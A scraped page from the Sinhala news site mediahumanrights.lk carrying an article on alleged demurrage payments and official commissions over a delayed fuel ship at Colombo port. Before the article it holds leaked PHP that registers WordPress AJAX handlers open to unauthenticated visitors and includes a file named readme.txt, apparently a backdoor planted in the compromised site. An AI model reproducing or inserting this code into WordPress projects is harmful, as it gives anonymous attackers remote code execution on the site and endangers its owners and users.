if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ඉන්ධන නැවකට විශාල ප‍්‍රමාද ගාස්තුවක්… තවත් ඉන්ධන නැවක් ගන්න පුළුවන්ලු… - mediahumanrights.lk
mediahumanrights.lk
Local News News

ඉන්ධන නැවකට විශාල ප‍්‍රමාද ගාස්තුවක්… තවත් ඉන්ධන නැවක් ගන්න පුළුවන්ලු…

කොළඹ වරායට පැමිණි මෙටි‍්‍රක් ටොන් 40,000ක  ඉන්ධන නෞකාව ගොඩබෑමට දින 13ක් ප්‍රමාදවීම හේතුවෙන් ඇමෙරිකානු ඩොලර් මිලියන 92ක් ගෙවීමට සිදුව ඇතැයි තෙල් සංස්ථාවේ කොලොන්නාව ඉන්ධන සමාගමේ සේවකයෝ සඳහන් කරන බව මවුබිම පුවත්පත වාර්තා කරයි.

මෙතරම් මුදලක් ගෙවීමට සිදුවීම මහා අපරාධයක් බවත් ඉන්ධන සඳහා ඩොලර් මිලියන පනස් දෙකක් ගෙවීමට අමතරව ප්‍රමාද ගාස්තු වශයෙන් ඩොලර් මිලියන හතළිහක් ගෙවා ඇති බවත් ඉන් තවත් ඉන්ධන නැවක් ගෙන්වීමට හැකියාව තිබූ බවත් සේවකයන් කියා සිටිති.

ඉන්ධන නැව් ගොඩබෑම කඩිනම් නොකර ඒවා මුහුදේ රඳවා ගැනීමෙන් පමාද ගාස්තු විශාල ප්‍රමාණයක් ගෙවීම පසුපස ඉහළ නිලධාරීන්ට විශාල කොමිස් මුදලක් ලැබෙනු ඇතැයිද සේවකයන් මෙන්ම වෘත්තීය සමති ද කියා සිටිති.

Related posts

Fitness Tips – How much exercise you need to be healthy

Shiran Viraj

උගතුන් පමණක් පාර්ලිමේන්තු එවීමේ උවමනාවක් නෑ..- මැ.කො.

Shiran Viraj

කොරෝනා නිසා රුහුණු විශ්ව විද්‍යාලය අපහසුතා රැසකට මුහුණ දී ඇති බව සිසුන් කියයි

Shiran Viraj